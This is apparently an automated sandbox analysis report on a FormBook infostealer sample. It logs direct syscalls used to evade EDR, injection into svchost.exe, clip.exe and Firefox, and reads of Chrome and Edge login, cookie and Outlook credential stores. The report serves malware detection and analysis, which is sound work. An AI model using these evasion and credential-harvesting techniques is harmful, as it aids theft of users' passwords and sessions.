            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]2_2_03104940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0083A66C
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00828189 SetUnhandledExceptionFilter,0_2_00828189
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008281AC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 5956Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 20A008Jump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083B106 LogonUserW,0_2_0083B106
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00803D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00803D19
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084411C SendInput,keybd_event,0_2_0084411C
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008474BB mouse_event,0_2_008474BB
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\s7Okni1gfE.exe"Jump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0083A66C
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008471FA
            Source: s7Okni1gfE.exe, WNGaDiurNI.exe, 00000006.00000000.1886445127.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2717334610.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000002.2718506190.0000000001641000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: WNGaDiurNI.exe, 00000006.00000000.1886445127.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2717334610.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000002.2718506190.0000000001641000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: WNGaDiurNI.exe, 00000006.00000000.1886445127.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2717334610.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000002.2718506190.0000000001641000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: s7Okni1gfE.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: WNGaDiurNI.exe, 00000006.00000000.1886445127.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2717334610.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000002.2718506190.0000000001641000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008265C4 cpuid 0_2_008265C4
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0085091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0085091D
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0087B340 GetUserNameW,0_2_0087B340
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00831E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00831E8E
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0081DDC0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: s7Okni1gfE.exeBinary or memory string: WIN_81
            Source: s7Okni1gfE.exeBinary or memory string: WIN_XP
            Source: s7Okni1gfE.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: s7Okni1gfE.exeBinary or memory string: WIN_XPe
            Source: s7Okni1gfE.exeBinary or memory string: WIN_VISTA
            Source: s7Okni1gfE.exeBinary or memory string: WIN_7
            Source: s7Okni1gfE.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
